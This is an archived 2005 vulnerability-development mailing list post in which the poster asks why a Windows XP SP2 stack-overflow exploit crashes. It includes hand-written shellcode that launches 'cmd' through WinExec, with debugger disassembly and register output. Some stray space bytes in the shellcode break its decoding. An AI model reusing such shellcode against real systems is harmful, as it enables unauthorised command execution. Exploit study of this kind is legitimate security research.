Vulnerability Development mailing list archives
problem to exploit a stack overflow
From: migalo digalo <l.epsilon () gmail com>
Date: Tue, 24 May 2005 14:09:56 +0000
hi all, ok i tested many test with shell that have not 0xcc and 0xc9 ... i dicided to test it with my own shellcode (a very simple one) unsigned char shellcode[] = "\xC6\x45\xFC\x63" /* mov byte ptr [ebp-4],63h*/ "\xC6\x45\xFD\x6D" /* mov byte ptr [ebp-3],6Dh*/ "\xC6\x45\xFE\x64" /*mov byte ptr [ebp-2],64h*/ "\x33\xC0" /*xor eax,eax*/ "\x50" /*push eax*/ "\x6A\x01 " /*push 1*/ "\x8D\x45\xFC " /*lea eax,[ebp-4]*/ "\x50" /*push eax*/ "\xB8\x4D\x11\x86\x7C" /*mov eax,0x7c86114d (winexec)*/ "\xFF\xD0" /*call eax*/ "\x6A\x01" /*push 1*/ "\xB8\xA2\xCA\x81\x7C" /*mov eax,0x7c81caa2(ExitProcess)*/ "\xFF\xD0"; /*call eax*/ and a degug session give me that: 0012FF34 C6 45 FC 63 mov byte ptr [ebp-4],63h 0012FF38 C6 45 FD 6D mov byte ptr [ebp-3],6Dh 0012FF3C C6 45 FE 64 mov byte ptr [ebp-2],64h 0012FF40 33 C0 xor eax,eax 0012FF42 50 push eax 0012FF43 6A 01 push 1 0012FF45 20 8D 45 FC 20 50 and byte ptr [ebp+5020FC45h],cl 0012FF4B B8 4D 11 86 7C mov eax,7C86114Dh 0012FF50 FF D0 call eax 0012FF52 6A 01 push 1 0012FF54 B8 A2 CA 81 7C mov eax,7C81CAA2h 0012FF59 FF D0 call eax 0012FF5B 90 nop EAX = 00000001 EBX = 7FFD9000 ECX = 00423AA8 EDX = 00000000 ESI = 00000000 EDI = 0012FF80 EIP = 0012FF34 ESP = 0012FF34 EBP = 90909090 EFL = 00000246 CS = 001B DS = 0023 ES = 0023 SS = 0023 FS = 003B GS = 0000 OV=0 UP=0 EI=1 PL=0 ZR=1 AC=0 PE=1 CY=0 9090908C = ?? ST0 = +0.00000000000000000e+0000 ST1 = +0.00000000000000000e+0000 ST2 = +0.00000000000000000e+0000 ST3 = +0.00000000000000000e+0000 ST4 = +0.00000000000000000e+0000 ST5 = +0.00000000000000000e+0000 ST6 = +0.00000000000000000e+0000 ST7 = +0.00000000000000000e+0000 CTRL = 027F STAT = 0000 TAGS = FFFF EIP = 00000000 CS = 0000 DS = 0000 EDO = 00000000 so the access violation happend (this time) in the beging of the shellcode !!!? is that a security future in xp sp2 ? or samething else? can sameone help me to understand this . thank you
Current thread:
- problem to exploit a stack overflow migalo digalo (May 23)
- Re: problem to exploit a stack overflow Valdis . Kletnieks (May 25)
- <Possible follow-ups>
- problem to exploit a stack overflow migalo digalo (May 25)
- Re: problem to exploit a stack overflow Daniele Milan (May 25)
- Re: problem to exploit a stack overflow 6d79676d61696c6163636f756e74 (May 25)